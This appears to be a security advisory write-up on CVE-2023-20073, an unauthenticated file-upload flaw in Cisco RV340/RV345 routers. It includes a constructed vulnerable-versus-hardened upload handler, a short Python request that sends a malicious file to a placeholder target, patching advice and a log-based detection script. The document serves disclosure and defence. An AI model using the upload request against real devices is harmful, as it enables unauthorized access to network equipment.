A security vulnerability has been discovered in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. This vulnerability, identified as CVE-2023-20073, could potentially allow an unauthenticated, remote attacker to upload arbitrary files to the affected device. This issue arises due to insufficient authorization enforcement mechanisms during file uploads.
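The advisory text above attributes the flaw to an authorization check that is not enforced on the upload path. The following Python is an added illustration of that bug class and is not Cisco's firmware code nor taken from the advisory: a toy management-interface handler that writes the uploaded body before validating the session (the weak pattern) next to one that refuses unauthenticated requests before any side effect. The `Request` class, the `X-Session-Token` and `X-Filename` headers and the session table are all constructed for the example.

```python
import os
import tempfile
from dataclasses import dataclass, field

# Constructed session table: maps a session token to a logged-in user.
VALID_SESSIONS = {"sess-7f3a9c": "admin"}


@dataclass
class Request:
    """Minimal stand-in for an HTTP request to the management interface."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def current_user(req):
    """Return the user bound to the request's session token, or None."""
    return VALID_SESSIONS.get(req.headers.get("X-Session-Token", ""))


def _safe_destination(upload_dir, filename):
    # basename strips directory components so the client cannot steer the
    # write outside upload_dir; empty or dot-only names are rejected.
    name = os.path.basename(filename)
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")
    return os.path.join(upload_dir, name)


def vulnerable_upload(req, upload_dir):
    """Insufficient authorization enforcement: the file is written first and
    the session is checked afterwards, so an unauthenticated client still
    lands a file on disk even though it receives a 401."""
    dest = _safe_destination(upload_dir, req.headers.get("X-Filename", "upload.bin"))
    with open(dest, "wb") as fh:
        fh.write(req.body)
    if current_user(req) is None:
        return 401, "unauthorized"
    return 200, "stored"


def hardened_upload(req, upload_dir):
    """Authorization is enforced before any side effect: no session, no write."""
    if current_user(req) is None:
        return 401, "unauthorized"
    dest = _safe_destination(upload_dir, req.headers.get("X-Filename", "upload.bin"))
    with open(dest, "wb") as fh:
        fh.write(req.body)
    return 200, "stored"


def demo(handler, upload_dir, authenticated=False):
    """Send one upload through handler; return (status, file_landed_on_disk)."""
    headers = {"X-Filename": "probe.txt"}
    if authenticated:
        headers["X-Session-Token"] = "sess-7f3a9c"
    req = Request("POST", "/upload", headers, b"constructed payload")
    status, _ = handler(req, upload_dir)
    return status, os.path.exists(os.path.join(upload_dir, "probe.txt"))


def run_demo(handler, authenticated=False):
    """Run demo() inside a throwaway directory so nothing persists."""
    with tempfile.TemporaryDirectory() as d:
        return demo(handler, d, authenticated)


if __name__ == "__main__":
    print("vulnerable, no session:", run_demo(vulnerable_upload))        # (401, True)
    print("hardened, no session:  ", run_demo(hardened_upload))          # (401, False)
    print("hardened, with session:", run_demo(hardened_upload, True))    # (200, True)
```

The point of the comparison is that the status code alone does not tell you whether the check was effective: both handlers answer 401, but only the hardened one has no file on disk afterwards.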

Exploit Details

An attacker could exploit this vulnerability by sending a specially crafted HTTP request to an affected device. If the exploit is successful, the attacker would be able to upload arbitrary files to the device, which could lead to significant security risks.

The code snippet below demonstrates how an attacker might send a crafted HTTP request.

import requests

# TARGET_IP_ADDRESS is a placeholder for the affected device; "/upload" stands
# in for the vulnerable endpoint and is not taken from the Cisco advisory.
url = "http://TARGET_IP_ADDRESS/upload"

# Passing the file via files= lets requests build the multipart body and set
# the Content-Type header with its boundary; setting that header by hand
# produces a malformed multipart request.
with open("malicious_file.txt", "rb") as fh:
    files = {"some_file": fh}
    response = requests.post(url, files=files)

print(response.status_code)
print(response.text)

In this example, the attacker could replace TARGET_IP_ADDRESS with the IP address of the affected Cisco device and malicious_file.txt with the file they wish to upload.

Original Sources

The vulnerability CVE-2023-20073 was originally disclosed by Cisco in their security advisory, which can be found here:

- Cisco Security Advisory

Recommendations

Affected users are advised to take the following steps to protect their devices from this vulnerability:

1. Update to the latest firmware for your Cisco RV Series Router. The patches for this specific vulnerability have been incorporated in the latest firmware updates for the affected devices.

  - Cisco RV Series Router Firmware Update

2. Monitor system logs regularly to detect any possible unauthorized access.
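As an added example of the log monitoring recommended above (not code from Cisco or from the advisory), the script below parses access-log lines in Common Log Format and raises an alert for every POST to an upload path on the management interface that does not originate from the administrative network. The log lines, the `/upload` path, the documentation-range addresses and the `192.168.1.0/24` admin network are all constructed assumptions; adjust the path list and networks to the device's real log format and your own management subnet.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed access-log lines; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges, and "/upload" is an assumed upload path.
SAMPLE_LOG = """\
203.0.113.45 - - [05/Apr/2023:16:20:01 +0000] "POST /upload HTTP/1.1" 200 512
192.168.1.10 - - [05/Apr/2023:16:21:07 +0000] "POST /upload HTTP/1.1" 200 8192
198.51.100.7 - - [05/Apr/2023:16:22:30 +0000] "GET /login HTTP/1.1" 200 1024
203.0.113.45 - - [05/Apr/2023:16:23:11 +0000] "POST /upload HTTP/1.1" 401 0
this line is not a log entry and is skipped
"""

# Common Log Format: client ident user [timestamp] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumed: the only network from which administrators manage the router.
ADMIN_NETS = [ipaddress.ip_network("192.168.1.0/24")]
# Assumed upload endpoints of the web-based management interface.
UPLOAD_PATHS = ("/upload",)


@dataclass
class Alert:
    source: str
    timestamp: str
    path: str
    status: int
    severity: str


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def from_admin_net(src):
    """True if src is a valid address inside one of the admin networks."""
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(ip in net for net in ADMIN_NETS)


def detect(log_text):
    """Flag upload POSTs from outside the admin network.

    A 2xx response means a file was accepted, so it is rated high; any other
    status still indicates probing of the upload path and is rated medium.
    """
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "POST" or not rec["path"].startswith(UPLOAD_PATHS):
            continue
        if from_admin_net(rec["src"]):
            continue
        status = int(rec["status"])
        severity = "high" if 200 <= status < 300 else "medium"
        alerts.append(Alert(rec["src"], rec["ts"], rec["path"], status, severity))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a.severity}] {a.timestamp} {a.source} POST {a.path} -> {a.status}")
```

Run against the constructed sample this yields two alerts for 203.0.113.45 (one high for the accepted upload, one medium for the rejected attempt) and nothing for the upload from the admin network or the GET request. A successful upload from an address that should never reach the management interface is the event worth paging on.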

By following these recommendations, users of affected devices can mitigate the risks associated with this vulnerability and ensure the security of their networks.

Timeline

Published on: 04/05/2023 16:15:00 UTC
Last modified on: 04/11/2023 19:16:00 UTC